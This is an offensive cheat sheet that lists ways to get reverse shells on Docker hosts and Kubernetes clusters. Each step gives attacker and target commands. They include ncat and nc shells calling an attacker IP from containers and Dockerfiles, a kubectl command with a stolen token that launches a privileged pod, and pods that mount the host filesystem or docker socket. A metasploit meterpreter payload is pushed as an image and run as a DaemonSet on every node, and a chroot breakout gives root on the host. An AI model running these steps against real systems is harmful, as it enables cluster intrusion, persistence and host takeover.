Get Reverse Shell (Docker/K8s)

Docker run

Attacker:

ncat -l -p 8989

Target System:

docker run raesene/ncat <attacker_IP> 8989 -e /bin/sh

---

Dockerfile

Attacker:

ncat -l -p 8989

Target System:

FROM ubuntu:18.04
RUN apt update && apt install -y ncat
RUN ncat <attacker_IP> 8989 -e /bin/sh
CMD ["/bin/bash"]

---

From compromised Pod

Attacker:

ncat -l -p 8989

Target System:

kubectl --server=https://K8S_HOST:K8S_PORT
        --insecure-skip-tls-verify=true 
        --token="<TOKEN>" 
        run --rm -it busybox --image=busybox --restart=Never 
        --overrides='{"apiVersion": "v1",      
              "spec":{"containers":[{"name":"busybox","image":"busybox",   
              "stdin":true, "tty":true, "command":["/bin/nc", 
              "192.168.42.1", "8989", "-e", "/bin/ash", "-i"],  
              "securityContext":{"privileged":true}}]}}'

---

K8s cluster

Attacker:

ncat -l -p 8989

Target System:

apiVersion: v1
kind: Pod
metadata:
  name: ncat-reverse-shell-pod
  labels:
    app: ncat
spec:
  containers:
  - name: ncat-reverse-shell
    image: raesene/ncat
    volumeMounts:
    - mountPath: /host
      name: hostvolume
    args: ['<attacker_IP>', '8989', '-e', '/bin/bash']
  volumes:
  - name: hostvolume
    hostPath:
      path: /
      type: Directory

---

Reverse shell on every node

Attacker:

# Create payload
$ docker run raesene/metasploit ./msfvenom -p linux/x64/meterpreter_reverse_http LHOST=<attacker_IP> LPORT=8989 -f elf > reverse_shell.elf

# Setup docker image
$ curl https://download.docker.com/linux/ubuntu/gpg > docker.gpg

# Build and push to docker hub
$ docker build -t raesene/reverse_shell .
$ docker push raesene/reverse_shell

# Setup metasploit
$ msfconsole
> use exploit/multi/handler
> set payload linux/x64/meterpreter_reverse_http
> set LHOST <attacker_IP>
> set LPORT 8989
> set ExitOnSession false
> exploit -j

$ cat Dockerfile
FROM ubuntu:18.04

RUN apt update && apt install -y apt-transport-https ca-certificates curl software-properties-common

COPY docker.gpg /docker.gpg
RUN apt-key add /docker.gpg
RUN add-apt-repository \
    "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
    $(lsb_release -cs) \
    stable"
RUN apt-get install -y docker-ce-cli

COPY reverse_shell.elf /reverse_shell.elf
RUN chmod +x /reverse_shell.elf
CMD ["/reverse_shell.elf"]

Target System:

# Get single shell
$ docker run raesene/reverse_shell

# Get shell inside container on each node
$ kubectl create -f reverse-shell-daemonset.yml

$ cat reverse-shell-daemonset.yml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: reverse-shell-daemonset
  labels:
spec:
  selector:
    matchLabels:
      name: reverse-shell-daemonset
  template:
    metadata:
      labels:
        name: reverse-shell-daemonset
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      containers:
      - name: revshell
        image: raesene/reverse-shell
        volumeMounts:
        - mountPath: /var/run/docker.sock
          name: dockersock
      volumes:
      - name: dockersock
        hostPath:
          path: /var/run/docker.sock

Attacker:

# Get shells
msf> sessions -l

# Get root on underlying host
msf> sessions -i 1
msf> shell
$ docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host

---

1. Docker and Kubernetes Reverse shells ↩

2. Making it Rain shells in Kubernetes ↩